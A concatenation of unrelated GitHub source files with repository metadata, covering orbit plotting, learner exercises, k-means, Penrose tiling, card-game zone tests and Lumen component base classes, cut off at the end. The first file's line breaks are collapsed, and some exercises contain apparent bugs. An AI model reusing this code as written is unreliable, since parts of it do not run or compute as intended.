calculate_parabolic_orbit_coords(self, orbit, body_radius): # Create theta value for periodic plotting theta = np.linspace(0, 2 * np.pi, self.__ORBIT_DIVS) # Polar equation of ellipse r = ((orbit.perigee) * 2 + (body_radius * 2)) / (1 - np.cos(theta)) # Convert polar equations to cartesean coords based on the given orbital inclination x = r * np.cos(theta) * np.cos(np.radians(orbit.inclination)) y = r * np.sin(theta) z = r * np.sin(np.radians(orbit.inclination)) * np.cos(theta) # Return the scaled coordinates of the parabolic orbit return self.calculate_scaled_coords(x, y, z) ''' Calculates the coordinates of the ascending node. Takes the radius of the body being orbited, the orbits inclination, the apogee, and the perigee/ Returns the coordinates scaled by __tick_value ''' def calculate_ascending_node_coords(self, body_radius, inclination, apogee, perigee): # Calculate the apoapsis/periapsis (distances from center of mass) of target orbit where inclination arrow will be plotted apoapsis = apogee + body_radius periapsis = perigee + body_radius # Calculate ascending node height ascending_node_height = math.sqrt(apoapsis * periapsis) # Return the scaled coordinates of the inclination change arrow return self.calculate_scaled_coords(0, -ascending_node_height, 0) ''' Calculates the coordinates of the apogee text annotation. Takes the x, y, and z coordinates of the orbit, each as a list of numbers ''' def calculate_apogee_text_coords(self, x, y, z): # Get coordinates of apogee text apogee_x = x[0] apogee_y = y[0] apogee_z = z[0] return (apogee_x, apogee_y, apogee_z) ''' Calculates the coordinates of the perigee text annotation. Takes the x, y, and z coordinates of the orbit, each as a list of numbers ''' def calculate_perigee_text_coords(self, x, y, z): # Index of orbit coordinates of the orbit's perigee perigee_coord_index = int(x.size / 2) # Get coordinates of perigee text perigee_x = x[perigee_coord_index] perigee_y = y[perigee_coord_index] perigee_z = z[perigee_coord_index] return (perigee_x, perigee_y, perigee_z) ''' Takes three lists, each representing x, y, and z coordinates, respectively. Returns these coordinates scaled by __tick_value ''' def calculate_scaled_coords(self, x, y, z): return (x / self.__tick_value, y / self.__tick_value, z / self.__tick_value) ''' Calculates the orbit, eccentricity, and semi-major axis of the transfer orbit. The transfer orbit is the elliptical orbit that transitions from one circular orbit to another. Takes the initial orbit, the target orbit, and the radius of the body being orbited ''' def calculate_transfer_orbit_elements(self, initial_orbit, target_orbit, body_radius): # Calculate apogee, perigee, apoapsis, and periapsis of the transfer orbit transfer_apogee = target_orbit.apogee transfer_perigee = initial_orbit.perigee transfer_apoapsis = transfer_apogee + body_radius transfer_periapsis = transfer_perigee + body_radius # Calculate semi-major axis of transfer orbit transfer_semi_major_axis = (transfer_apoapsis + transfer_periapsis) / 2 # Calculate eccentricity of transfer orbit transfer_eccentricity = (transfer_apoapsis - transfer_periapsis) / (transfer_apoapsis + transfer_periapsis) # Variable to hold the inclination of the transfer orbit transfer_inclination = 0 ''' Determine whether the initial or target orbit is the higher one, and set the transfer inclination as needed. The transfer orbit will be plotted to show path taken either before or after an inclination change, whichever is most efficient ''' if initial_orbit.apogee > target_orbit.apogee: transfer_inclination = target_orbit.inclination else: transfer_inclination = initial_orbit.inclination # If the transfer apogee < transfer perigee (such as when maneuvering from higher orbit to a lower orbit), flip the values if transfer_apogee < transfer_perigee: temp = transfer_apogee transfer_apogee = transfer_perigee transfer_perigee = temp # Return a new orbit that represents the elliptical transfer orbit, the transfer eccentricity, and the transfer semi-major axis return (Orbit(transfer_apogee, transfer_perigee, transfer_inclination), transfer_eccentricity, transfer_semi_major_axis) ''' Calculates the orbit, eccentricity, and semi-major axis of the in-between orbit. The in-between orbit is the orbit the spacecraft will be in after an inclination change to show how the spacecraft will transition between inclination changes and Hohmann transfer orbits. Takes the initial orbit, the target orbit, and the radius of the body being orbited ''' def calculate_in_between_orbit_elements(self, initial_orbit, target_orbit, body_radius): # Variables to hold in-between apogee and perigee in_between_apogee = 0 in_between_perigee = 0 # Variable to hold inclination of the in-between orbit in_between_inclination = 0 # If maneuver shrinks the orbit if initial_orbit.apogee > target_orbit.apogee: in_between_apogee = initial_orbit.apogee in_between_perigee = initial_orbit.perigee in_between_inclination = target_orbit.inclination # If the maneuver expands the orbit else: in_between_apogee = target_orbit.apogee in_between_perigee = target_orbit.perigee in_between_inclination = initial_orbit.inclination # Calculate in-between orbit apsis in_between_apoapsis = in_between_apogee + body_radius in_between_periapsis = in_between_perigee + body_radius # Calculate eccentricity of in-between orbit in_between_eccentricity = (in_between_apoapsis - in_between_periapsis) / (in_between_apoapsis + in_between_periapsis) # Calculate semi-major axis of in-between orbit in_between_semi_major_axis = (in_between_apoapsis + in_between_periapsis) / 2 # Return a new orbit that represents the in-between orbit, the in-between eccentricity, and the in-between semi-major axis return (Orbit(in_between_apogee, in_between_perigee, in_between_inclination), in_between_eccentricity, in_between_semi_major_axis)
JackCSheehan/pyrigee
pyrigee/plotting_calculator.py
plotting_calculator.py
py
9,801
python
en
code
9
github-code
6
23099951540
from random import random def check(number,list): if number in list: return False else: return True list =[0, 1, 2, 3, 4, 5, 6, 7, 8, 9] def func(i,list): index = int(random()*10) if index <= len(list)-1: cleaner = list[i] list[i]= list[index] list[index]=cleaner for i in list: func(i,list) print(list)
gochicus/python-learning
lesson-2/ex5.py
ex5.py
py
382
python
en
code
0
github-code
6
70084638589
from sklearn.cluster import KMeans import numpy as np import matplotlib.pyplot as plt # X = np.array([[1, 2], [1, 4], [1, 0], [10, 2], [10, 4], [10, 0]]) X = np.array(np.random.random((100, 2))) kmeans = KMeans(n_clusters=2).fit(X) print('Labels') print(kmeans.labels_) result = kmeans.predict([[0, 0], [12, 3]]) print('result') print(result) print('clusters') print(kmeans.cluster_centers_) plt.scatter(X[:, 0], X[:, 1], c=kmeans.labels_) plt.xlabel("X") plt.ylabel("Y") plt.show()
bpark/ml-demos
simple_kmeans.py
simple_kmeans.py
py
486
python
en
code
0
github-code
6
31624687973
import math import numpy as np PSI = (math.sqrt(5) - 1) / 2 PSI_2 = 1 - PSI TOL = 1.e-5 class Triangle: def __init__(self, v1, v2, v3): self.v1 = v1 self.v2 = v2 self.v3 = v3 def path(self, opacity, fill_color): side_l, side_r = self.v2 - self.v1, self.v3 - self.v2 # MOVE TO d = "m {}, {} ".format(self.v1[0], self.v1[1]) # LINE TO d += "l {}, {} ".format(side_l[0], side_l[1]) d += "l {}, {} ".format(side_r[0], side_r[1]) # LINE TO, CLOSE PATH d += "l {}, {}z".format(-side_l[0], -side_l[1]) return '<path fill="{}" opacity="{}" d="{}"/>'.format(fill_color, opacity, d) def dotted(self, stroke_width, stroke_color="black", tile_color="black", radius=0.1): svg_circle = lambda point: '<circle cx="{}" cy="{}" r="{}" stroke="{}" stroke-width="{}" fill="{}" />\n'.format(point[0], point[1], radius, stroke_color, stroke_width, tile_color) side_l, side_r = self.v2 - self.v1, self.v3 - self.v2 d = svg_circle(self.v1) d += svg_circle(side_l) d += svg_circle(side_r) d += svg_circle(-side_l) return d @property def center(self): return (self.v1 + self.v3)/2 def mirror(self): v1 = np.array([self.v1[0], -self.v1[1]]) v2 = np.array([self.v2[0], -self.v2[1]]) v3 = np.array([self.v3[0], -self.v3[1]]) return self.__class__(v1, v2, v3) class Fatty(Triangle): def split(self): s1 = PSI_2 * self.v1 + PSI * self.v3 s2 = PSI_2 * self.v1 + PSI * self.v2 return (Fatty(s1, s2, self.v1), Tiny(s2, s1, self.v2), Fatty(self.v3, s1, self.v2)) class Tiny(Triangle): def split(self): s1 = PSI * self.v1 + PSI_2 * self.v2 return (Tiny(s1, self.v3, self.v1), Fatty(self.v3, s1, self.v2)) class Tiling: def __init__(self, initial=None, depth = 5, scale = 100, mirror=True): """Tiling manager class. Args: initial (list of `Triangle`, optional): The initial tiling. Defaults to None. """ if initial is None or initial == "rombus": theta = 2 * math.pi / 5 rot = np.array([math.cos(theta), math.sin(theta)]) v1 = np.array([-scale / 2, 0]) v2 = scale / 2 * rot v3 = np.array([scale / 2 / PSI, 0]) initial = [Fatty(v1, v2, v3)] elif initial == "hexagon": theta = math.pi / 5 alpha = math.cos(theta) rot = np.array([math.cos(theta), math.sin(theta)]) v1 = np.array([scale, 0]) c = np.array([0, 0]) u1 = u2 = np.array([v1[0]*rot[0]-v1[1]*rot[1], v1[0]*rot[1]+v1[1]*rot[0]]) v2 = v3 = np.array([u1[0]*rot[0]-u1[1]*rot[1], u1[0]*rot[1]+u1[1]*rot[0]]) u3 = u4 = np.array([v3[0]*rot[0]-v3[1]*rot[1], v3[0]*rot[1]+v3[1]*rot[0]]) v4 = v5 = np.array([u4[0]*rot[0]-u4[1]*rot[1], u4[0]*rot[1]+u4[1]*rot[0]]) u5 = -v1 initial = [ Tiny(v1, c, u1), Tiny(v2, c, u2), Tiny(v3, c, u3), Tiny(v4, c, u4), Tiny(v5, c, u5) ] self.tiling = initial self.depth = depth self.mirror = mirror self.scale = scale self._create(depth, mirror) def _create(self, depth, mirror): # Cut the tiles recursively for _ in range(depth): new_tiling = [] for tile in self.tiling: new_tiling.extend(tile.split()) self.tiling = new_tiling # Mirror the tiling along the x-Axis if mirror: self.tiling.extend([tile.mirror() for tile in self.tiling]) def to_svg(self, filepath, dotted=False, width=0.005, margin=1.05, fill_color="white", stroke_color="black", radius=.0005): stroke_width = str(PSI ** self.depth * self.scale * width) # Create viewport xmin = ymin = - self.scale * margin width = height = 2 * self.scale * margin viewbox ='{} {} {} {}'.format(xmin, ymin, width, height) svg = ['<?xml version="1.0" encoding="utf-8"?>'] svg.append('<svg width="100%" height="100%" viewBox="{}"'.format(viewbox)) svg.append(' preserveAspectRatio="xMidYMid meet" version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">') # Elements container svg.append('<g style="stroke:{}; stroke-width: {};">'.format(stroke_color, stroke_width)) # Generates elements if dotted: for tile in self.tiling: svg.append(tile.dotted(stroke_width, stroke_color, fill_color, .0005)) else: for tile in self.tiling: svg.append(tile.path(1, fill_color)) svg.append('</g>\n</svg>') svg = '\n'.join(svg) filepath = "{}_{}_{}".format(filepath, self.depth, width) with open(filepath, 'w') as fo: fo.write(svg) if __name__ == "__main__": t1 = Tiling(initial="hexagon", depth=8, scale=400) t1.to_svg("output/rose", fill_color="pink", dotted=True, width=0.4) # print_svg("penrose_2_3.svg", intial_tiling=t2, depth=2, base_width=.3) # print_svg_dotted("penrose_dotted_9_3.svg", intial_tiling=t2, scale=scale, depth=9, base_width=.05)
RCoanda/rosey
base.py
base.py
py
5,459
python
en
code
0
github-code
6
73928012028
import collections import random import unittest import mock from cardboard import card as c, events, zone as z from cardboard.tests.util import GameTestCase from cardboard.util import ANY ENTER, LEAVE = events.ENTERED_ZONE, events.LEFT_ZONE class ZoneTest(GameTestCase): card = mock.Mock(spec=c.Card) def setUp(self): super(ZoneTest, self).setUp() self.u = z.UnorderedZone( name="Emerald Hill", game=self.game, contents=self.library, ) self.o = z.OrderedZone( name="Casino Night", game=self.game, contents=self.library, ) class TestZones(ZoneTest): def test_name(self): self.assertEqual(self.u.name, "Emerald Hill") self.assertEqual(self.o.name, "Casino Night") def test_ordered(self): self.assertFalse(self.u.ordered) self.assertTrue(self.o.ordered) def test_str_repr(self): self.assertEqual(str(self.u), "Emerald Hill") self.assertEqual(str(self.o), "Casino Night") self.assertEqual(repr(self.u), "<Zone: Emerald Hill>") self.assertEqual(repr(self.o), "<Zone: Casino Night>") def test_contains(self): for i in self.library: self.assertIn(i, self.u) self.assertIn(i, self.o) self.assertNotIn(object(), self.u) self.assertNotIn(object(), self.o) def test_iter(self): self.assertEqual(set(self.u), set(self.library)) self.assertEqual(list(self.o), self.library) def test_len(self): self.assertEqual(len(self.u), len(self.library)) self.assertEqual(len(self.o), len(self.library)) def test_add(self): with self.assertTriggers(event=ENTER, card=30, zone=self.u): self.u.add(30) with self.assertTriggers(event=ENTER, card=30, zone=self.o): self.o.add(30) self.assertEqual(set(self.u), set(self.library) | {30}) self.assertEqual(list(self.o), self.library + [30]) def test_add_already_contains(self): NO_OWNER, OWNER = "on the {}", "in {}'s {}" u, o = self.u.name, self.o.name n = mock.Mock() self.u.add(n) self.o.add(n) self.resetEvents() with self.assertRaisesRegexp(ValueError, NO_OWNER.format(u)): self.u.add(n) with self.assertRaisesRegexp(ValueError, NO_OWNER.format(o)): self.o.add(n) with self.assertRaisesRegexp(ValueError, OWNER.format(n.owner, u)): self.u.owner = n.owner self.u.add(n) with self.assertRaisesRegexp(ValueError, OWNER.format(n.owner, o)): self.o.owner = n.owner self.o.add(n) # wasn't added twice nor removed self.assertIn(self.library[0], self.u) self.assertEqual(self.o.count(self.library[0]), 1) self.assertFalse(self.events.trigger.called) def test_add_owner_redirection(self): """ Adding a card with a different owner than the zone's redirects. """ card = mock.Mock() self.u.name, self.o.name = "foo", "bar" self.u.owner, self.o.owner = mock.Mock(), mock.Mock() self.u.add(card) self.o.add(card) card.owner.foo.add.assert_called_once_with(card) card.owner.bar.add.assert_called_once_with(card) def test_move(self): self.o.add(self.card) self.card.zone = self.o # on actual cards this is a property with self.assertTriggers(event=ENTER, card=self.card, zone=self.u): self.u.move(self.card) self.card.zone = self.u self.assertIn(self.card, self.u) with self.assertTriggers(event=ENTER, card=self.card, zone=self.o): self.o.move(self.card) self.assertIn(self.card, self.o) def test_move_to_self(self): self.resetEvents() # shouldn't even be checking library[0].zone with self.assertRaises(ValueError): self.u.move(self.library[0]) with self.assertRaises(ValueError): self.o.move(self.library[0]) # wasn't added twice nor removed self.assertIn(self.library[0], self.u) self.assertEqual(self.o.count(self.library[0]), 1) self.assertFalse(self.events.trigger.called) def test_pop(self): self.resetEvents() e = self.u.pop() self.assertLastEventsWere([dict(event=LEAVE, card=e, zone=self.u)]) self.resetEvents() f = self.o.pop() self.assertLastEventsWere([dict(event=LEAVE, card=f, zone=self.o)]) self.assertEqual(set(self.u), set(self.library) - {e}) self.assertEqual(list(self.o), self.library[:-1]) def test_remove(self): e = self.library[-7] self.library.remove(e) with self.assertTriggers(event=LEAVE, card=e, zone=self.u): self.u.remove(e) with self.assertTriggers(event=LEAVE, card=e, zone=self.o): self.o.remove(e) self.assertEqual(set(self.u), set(self.library)) self.assertEqual(list(self.o), self.library) self.assertRaises(ValueError, self.u.remove, object()) self.assertRaises(ValueError, self.o.remove, object()) def test_update(self): self.u.update(range(4)) for i in range(4): self.assertIn(i, self.u) self.assertEqual(len(self.u), len(self.library) + 4) evs = [dict(event=ENTER, card=i, zone=self.u) for i in range(4)] self.assertLastEventsWere(evs) self.resetEvents() self.o.update(range(4)) self.assertEqual(self.o[-4:], range(4)) self.assertEqual(len(self.o), len(self.library) + 4) evs = [dict(event=ENTER, card=i, zone=self.o) for i in range(4)] self.assertLastEventsWere(evs) def test_silent(self): self.o.add(self.card) self.card.zone = self.o self.resetEvents() self.u.add(20, silent=True) self.o.add(20, silent=True) self.u.remove(self.library[0], silent=True) self.o.remove(self.library[0], silent=True) self.u.pop(silent=True) self.o.pop(silent=True) self.u.move(self.card, silent=True) self.card.zone = self.u self.o.move(self.card, silent=True) self.u.update(range(10), silent=True) self.o.update(range(10), silent=True) self.assertFalse(self.events.trigger.called) def test_iterable(self): i = range(10) # TODO: This is incomplete, all the methods don't take iterables o = z.OrderedZone(game=None, name="Emerald Hill", contents=i) u = z.UnorderedZone(game=None, name="Emerald Hill", contents=i) i.pop() self.assertEqual(list(o), range(10)) self.assertEqual(list(u), range(10)) class TestOrderedZone(ZoneTest): def test_reversed(self): self.assertEqual(list(reversed(self.o)), list(reversed(self.library))) def test_getitem(self): for i, e in enumerate(self.library): self.assertEqual(self.o[i], e) self.assertEqual(self.o[2:7:2], self.library[2:7:2]) def test_set_del_item(self): self.assertRaises(AttributeError, getattr, self.o, "__setitem__") self.assertRaises(AttributeError, getattr, self.o, "__delitem__") def test_count(self): o = z.OrderedZone(game=None, name="Emerald Hill", contents=[1, 1, 1, 2, 2, 3]) for i, e in enumerate(range(3, 0, -1), 1): self.assertEqual(o.count(e), i) def test_index(self): e = self.library[4] self.assertEqual(self.o.index(e), 4) def test_pop_index(self): e1 = self.o.pop(0) e2 = self.o.pop(4) self.library.pop(0) self.library.pop(4) self.assertEqual(list(self.o), self.library) self.assertLastEventsWere([ {"event" : LEAVE, "card" : e1, "zone" : self.o}, {"event" : LEAVE, "card" : e2, "zone" : self.o}, ]) def test_reverse(self): self.o.reverse() self.assertEqual(list(self.o), list(reversed(self.library))) def test_shuffle(self): with mock.patch("cardboard.zone.random.shuffle") as shuffle: self.o.shuffle() shuffle.assert_called_once_with(self.o._order) class TestZone(unittest.TestCase): def test_zone(self): c = mock.Mock() for zone in ["battlefield", "exile", "hand"]: n = z.zone[zone](game=None, contents=[c]) self.assertIsInstance(n, z.UnorderedZone) self.assertEquals(n.name, zone) self.assertIn(c, n) for zone in ["graveyard", "library", "stack"]: n = z.zone[zone](game=None, contents=[c]) self.assertIsInstance(n, z.OrderedZone) self.assertEquals(n.name, zone) self.assertIn(c, n)
Julian/cardboard
cardboard/tests/test_zone.py
test_zone.py
py
8,874
python
en
code
7
github-code
6
36821141161
from math import ceil import time def add_up_version1(list_numbers, number): half = ceil(number/2) pairs = [] for item in range(half): temp = [] temp.append(item) temp.append(number - item) pairs.append(temp) for item in pairs: if item[0] in list_numbers and item[1] in list_numbers: return True return False def add_up_version2(list_numbers, number): for item in range(len(list_numbers)): temp_list = list_numbers.copy() temp_number = temp_list.pop(item) for num in temp_list: if temp_number + num == number: return True return False def main(): start_time = time.time() print(add_up_version1([10, 15, 3, 7], 17)) print(add_up_version1([1, 2, 3, 4], 3)) print(add_up_version1([1, 2, 3, 4], 4)) print(add_up_version1([1, 2, 3, 4], 10)) end_time = time.time() print(end_time - start_time) start_time = time.time() print(add_up_version2([10, 15, 3, 7], 17)) print(add_up_version2([1, 2, 3, 4], 3)) print(add_up_version2([1, 2, 3, 4], 4)) print(add_up_version2([1, 2, 3, 4], 10)) end_time = time.time() print(end_time - start_time) if __name__ == "__main__": main()
analetisouza/daily-problem
day1.py
day1.py
py
1,266
python
en
code
0
github-code
6
32660332596
""" Implements the baseclasses for all Component types in Lumen. The base classes implement the core validation logic and the ability to dynamically resolve Source and Variable references. """ from __future__ import annotations import warnings from functools import partial from typing import ( Any, ClassVar, Dict, List, Tuple, Type, ) import pandas as pd import panel as pn import param # type: ignore from panel.io.cache import _container_hash, _hash_funcs from panel.util import classproperty from typing_extensions import Literal from .state import state from .util import ( VARIABLE_RE, cleanup_expr, is_ref, resolve_module_reference, ) from .validation import ( ValidationError, match_suggestion_message, reverse_match_suggestion, validate_parameters, ) class Component(param.Parameterized): """ Baseclass for all Lumen component types including Source, Filter, Transform, Variable and View types. Components must implement serialization and deserialization into a specification dictionary via the `from_spec` and `to_spec` protocol. Additonally they should implement validation. """ __abstract = True # Whether the component allows references _allows_refs: ClassVar[bool] = True # Parameters that are computed internally and are not part of the # component specification _internal_params: ClassVar[List[str]] = ['name'] # Deprecated parameters that are still allowed as spec keys _legacy_params: ClassVar[List[str]] = [] # Keys that must be declared declared as a list of strings or # tuples of strings if one of multiple must be defined. _required_keys: ClassVar[List[str | Tuple[str, ...]]] = [] # Keys that are valid to define _valid_keys: ClassVar[List[str] | Literal['params'] | None] = None # Whether to enforce parameter validation in specification _validate_params: ClassVar[bool] = False def __init__(self, **params): self._refs = params.pop('refs', {}) expected = list(self.param) validate_parameters(params, expected, type(self).name) if self._allows_refs: params = self._extract_refs(params, self._refs) super().__init__(**params) for p, ref in self._refs.items(): if isinstance(state.variables, dict): continue elif isinstance(ref, str) and '$variables' in ref: ref_vars = VARIABLE_RE.findall(ref) state.variables.param.watch(partial(self._update_ref, p, ref), ref_vars) if '.' not in p and p not in params: self._update_ref(p, ref) def _extract_refs(self, params: Dict[str, Any], refs: Dict[str, Any]): from .variables import Variable processed = {} for pname, pval in params.items(): if is_ref(pval): refs[pname] = pval elif isinstance(pval, (pn.widgets.Widget, param.Parameter, Variable)): var = state.variables.add_variable(pval) processed[pname] = var.value refs[pname] = f'$variables.{var.name}' continue elif isinstance(pval, dict): subrefs = {} processed[pname] = self._extract_refs(pval, subrefs) for subkey, subref in subrefs.items(): refs[f'{pname}.{subkey}'] = subref continue else: processed[pname] = pval return processed def _update_ref(self, pname: str, ref: str, *events: param.parameterized.Event): """ Component should implement appropriate downstream events following a change in a variable. """ expr = cleanup_expr(ref) new_value = pd.eval(expr, local_dict=dict(state.variables), engine='python') if '.' in pname: pname, *keys = pname.split('.') old = getattr(self, pname) current = new = old.copy() for k in keys[:-1]: current = current[k] current[keys[-1]] = new_value else: new = new_value self.param.update({pname: new}) def _sync_refs(self, trigger: bool = True): updates = [] for p, ref in self._refs.items(): if isinstance(state.variables, dict): continue elif isinstance(ref, str) and '$variables' in ref: with param.discard_events(self): self._update_ref(p, ref) pname, *_ = p.split('.') updates.append(pname) if trigger: self.param.trigger(*updates) ################################################################## # Validation API ################################################################## @classproperty def _valid_keys_(cls) -> List[str] | None: if cls._valid_keys == 'params': valid = [p for p in cls.param if p not in cls._internal_params] else: valid = cls._valid_keys return valid if valid is None else valid + cls._legacy_params @classmethod def _validate_keys_(cls, spec: Dict[str, Any]): valid_keys = cls._valid_keys_ for key in spec: if valid_keys is None or key in valid_keys: continue msg = f'{cls.__name__} component specification contained unknown key {key!r}.' msg = match_suggestion_message(key, cls._valid_keys_ or [], msg) raise ValidationError(msg, spec, key) @classmethod def _validate_required_( cls, spec: Dict[str, Any], required: List[str | Tuple[str, ...]] | None = None ): if required is None: required_keys = cls._required_keys else: required_keys = required for key in required_keys: if isinstance(key, str): if key in spec: continue msg = f'The {cls.__name__} component requires {key!r} parameter to be defined.' msg, attr = reverse_match_suggestion(key, list(spec), msg) raise ValidationError(msg, spec, attr) elif isinstance(key, tuple): if any(f in spec for f in key): continue skey = sorted(key) key_str = "', '".join(skey[:-1]) + f"' or '{skey[-1]}" msg = f"{cls.__name__} component requires one of '{key_str}' to be defined." for f in key: msg, attr = reverse_match_suggestion(f, list(spec), msg) if attr: break raise ValidationError(msg, spec, attr) @classmethod def _validate_list_subtypes( cls, key: str, subtype: Type[Component], subtype_specs: List[Dict[str, Any] | str], spec: Dict[str, Any], context: Dict[str, Any], subcontext: List[Dict[str, Any] | str] | None = None ): if not isinstance(subtype_specs, list): raise ValidationError( f'{cls.__name__} component {key!r} key expected list type but got {type(subtype_specs).__name__}. ' "This could be because of a missing dash in the yaml file.", spec, key ) subtypes = [] for subtype_spec in subtype_specs: subtype_spec = subtype.validate(subtype_spec, context) subtypes.append(subtype_spec) if subcontext is not None: subcontext.append(subtype_spec) return subtypes @classmethod def _validate_dict_subtypes( cls, key: str, subtype: Type[Component], subtype_specs: Dict[str, Dict[str, Any] | str], spec: Dict[str, Any], context: Dict[str, Any], subcontext: Dict[str, Any] | None = None ): if not isinstance(subtype_specs, dict): raise ValidationError( f'{cls.__name__} component {key!r} key expected dict type but got {type(subtype_specs).__name__}.', spec, key ) subtypes = {} for subtype_name, subtype_spec in subtype_specs.items(): subtypes[subtype_name] = subtype.validate(subtype_spec, context) if subcontext is not None: subcontext[subtype_name] = subtypes[subtype_name] return subtypes @classmethod def _validate_str_or_spec( cls, key: str, subtype: Type[Component], subtype_spec: Dict[str, Any] | str, spec: Dict[str, Any], context: Dict[str, Any] ): if isinstance(subtype_spec, str): if subtype_spec not in context[f'{key}s']: msg = f'{cls.__name__} component specified non-existent {key} {subtype_spec!r}.' msg = match_suggestion_message(subtype_spec, list(context[key]), msg) raise ValidationError(msg, spec, subtype_spec) return subtype_spec return subtype.validate(subtype_spec, context) @classmethod def _validate_dict_or_list_subtypes( cls, key: str, subtype: Type[Component], subtype_specs: Dict[str, Dict[str, Any] | str] | List[Dict[str, Any] | str], spec: Dict[str, Any], context: Dict[str, Any], subcontext: Dict[str, Any] | List[Dict[str, Any] | str] | None = None ): if isinstance(subtype_specs, list): assert subcontext is None or isinstance(subcontext, list) return cls._validate_list_subtypes(key, subtype, subtype_specs, spec, context, subcontext) else: assert subcontext is None or isinstance(subcontext, dict) return cls._validate_dict_subtypes(key, subtype, subtype_specs, spec, context, subcontext) @classmethod def _deprecation( cls, msg: str, key: str, spec: Dict[str, Any], update: Dict[str, Any] ): warnings.warn(msg, DeprecationWarning) if key not in spec: spec[key] = {} spec[key].update(update) @classmethod def _validate_ref( cls, key: str, value: Any, spec: Dict[str, Any], context: Dict[str, Any] ): refs = value[1:].split('.') if refs[0] == 'variables': if refs[1] not in context.get('variables', {}): msg = f'{cls.__name__} component {key!r} references undeclared variable {value!r}.' msg = match_suggestion_message(refs[1], list(context.get('variables', {})), msg) raise ValidationError(msg, spec, refs[1]) elif refs[0] not in context.get('sources', {}): msg = f'{cls.__name__} component {key!r} references undeclared source {value!r}.' msg = match_suggestion_message(refs[1], list(context.get('sources', {})), msg) raise ValidationError(msg, spec, refs[1]) @classmethod def _validate_param(cls, key: str, value: Any, spec: Dict[str, Any]): pobj = cls.param[key] try: if isinstance(pobj, param.Selector) and pobj.names and value in pobj.names: return pobj._validate(value) except Exception as e: msg = f"{cls.__name__} component {key!r} value failed validation: {str(e)}" raise ValidationError(msg, spec, key) @classmethod def _is_component_key(cls, key: str) -> bool: if key not in cls.param: return False pobj = cls.param[key] return ( isinstance(pobj, param.ClassSelector) and isinstance(pobj.class_, type) and issubclass(pobj.class_, Component) ) @classmethod def _is_list_component_key(cls, key: str) -> bool: if key not in cls.param: return False pobj = cls.param[key] return ( isinstance(pobj, param.List) and isinstance(pobj.item_type, type) and issubclass(pobj.item_type, Component) ) @classmethod def _validate_spec_( cls, spec: Dict[str, Any], context: Dict[str, Any] | None = None ) -> Dict[str, Any]: validated: Dict[str, Any] = {} if context is None: context = validated for key in (cls._valid_keys_ or list(spec)): if key not in spec: continue val = spec[key] if is_ref(val) and not cls._allows_refs: raise ValidationError( f'{cls.__name__} component does not allow references but {key} ' f'value ({val!r}) is a reference.', spec, val ) if hasattr(cls, f'_validate_{key}'): val = getattr(cls, f'_validate_{key}')(val, spec, context) elif cls._is_component_key(key): val = cls.param[key].class_.validate(val, context) elif cls._is_list_component_key(key): val = cls._validate_list_subtypes( key, cls.param[key].item_type, val, spec, context ) elif is_ref(val): cls._validate_ref(key, val, spec, context) elif key in cls.param: if isinstance(val, str) and val.startswith('@'): continue cls._validate_param(key, val, spec) validated[key] = val return validated ################################################################## # Public API ################################################################## @property def refs(self) -> List[str]: return [v for k, v in self._refs.items() if v.startswith('$variables.')] @classmethod def from_spec(cls, spec: Dict[str, Any] | str) -> 'Component': """ Creates a Component instance from a specification. Parameters ---------- spec : dict or str Specification declared as a dictionary of parameter values or a string referencing a source in the sources dictionary. Returns ------- Resolved and instantiated Component object """ if isinstance(spec, str): raise ValueError( "Component cannot be materialized by reference. Please pass " "full specification for the component." ) return cls(**spec) def to_spec(self, context: Dict[str, Any] | None = None) -> Dict[str, Any]: """ Exports the full specification to reconstruct this component. Parameters ---------- context: Dict[str, Any] Context contains the specification of all previously serialized components, e.g. to allow resolving of references. Returns ------- Declarative specification of this component. """ spec = {} for p, value in self.param.values().items(): if p in self._internal_params or value == self.param[p].default: continue elif self._is_component_key(p): pspec = value.to_spec(context=context) if not pspec: continue value = pspec elif self._is_list_component_key(p): value = [ None if v is None else v.to_spec(context=context) for v in value ] spec[p] = value if context is not None: spec.update(self._refs) return spec @classmethod def validate( cls, spec: Dict[str, Any] | str, context: Dict[str, Any] | None = None ) -> Dict[str, Any] | str: """ Validates the component specification given the validation context. Arguments ----------- spec: dict | str The specification for the component being validated (or a referene to the component) context: dict Validation context contains the specification of all previously validated components, e.g. to allow resolving of references. Returns -------- Validated specification. """ if isinstance(spec, str): return spec context = {} if context is None else context cls._validate_keys_(spec) cls._validate_required_(spec) return cls._validate_spec_(spec, context) class MultiTypeComponent(Component): """ MultiComponentType is the baseclass for extensible Lumen components. A `MultiTypeComponent` can be resolved using the `_get_type` method either by the name declared in the `<component>_type` attribute, where the name of the component represent the immediate subclasses of MultiTypeComponent. For example `class View(MultiTypeComponent)` should define `view_type` for all its descendants to override. Just as any other Component, `MultiTypeComponent` implements methods to construct an instance from a specification, export the specification of a component and the ability to validate a component. """ __abstract = True _required_keys: ClassVar[List[str | Tuple[str, ...]]] = ['type'] @classproperty def _valid_keys_(cls) -> List[str | Tuple[str, ...]] | None: if cls._valid_keys is None: valid = None elif cls._valid_keys == 'params': valid = list(cls.param) elif 'params' in cls._valid_keys: valid = cls._valid_keys.copy() valid.extend(list(cls.param)) else: valid = cls._valid_keys.copy() if valid is not None and 'type' not in valid: valid.append('type') return valid if valid is None else valid + cls._legacy_params @classproperty def _base_type(cls): if cls is MultiTypeComponent: return return cls.__mro__[cls.__mro__.index(MultiTypeComponent)-1] @classproperty def _component_type(cls) -> str: component_type = getattr(cls, f'{cls._base_type.__name__.lower()}_type') if component_type is not None: return component_type return f'{cls.__module__}.{cls.__name__}' @classmethod def _import_module(cls, component_type: str): base_type = cls._base_type try: import_name = f'lumen.{base_type.__name__.lower()}s.{component_type}' __import__(import_name) except ImportError as e: if e.name != import_name: msg = ( f"In order to use the {base_type.__name__.lower()} " f"component '{component_type}', the '{e.name}' package " "must be installed." ) raise ImportError(msg) @classmethod def _get_type( cls, component_type: str, spec: Dict[str, Any] | None = None ) -> Type['MultiTypeComponent']: base_type = cls._base_type if component_type is None: raise ValidationError( f"No 'type' was provided during instantiation of {base_type.__name__} component.", spec ) if '.' in component_type: return resolve_module_reference(component_type, base_type) cls._import_module(component_type) subcls_types = set() for subcls in param.concrete_descendents(cls).values(): subcls_type = subcls._component_type if subcls_type is None: continue subcls_types.add(subcls_type) if subcls_type == component_type: return subcls msg = f"{base_type.__name__} component specification declared unknown type '{component_type}'." msg = match_suggestion_message(component_type, list(subcls_types), msg) raise ValidationError(msg, spec, component_type) ################################################################## # Public API ################################################################## @classmethod def from_spec(cls, spec: Dict[str, Any] | str) -> 'MultiTypeComponent': if isinstance(spec, str): raise ValueError( "MultiTypeComponent cannot be 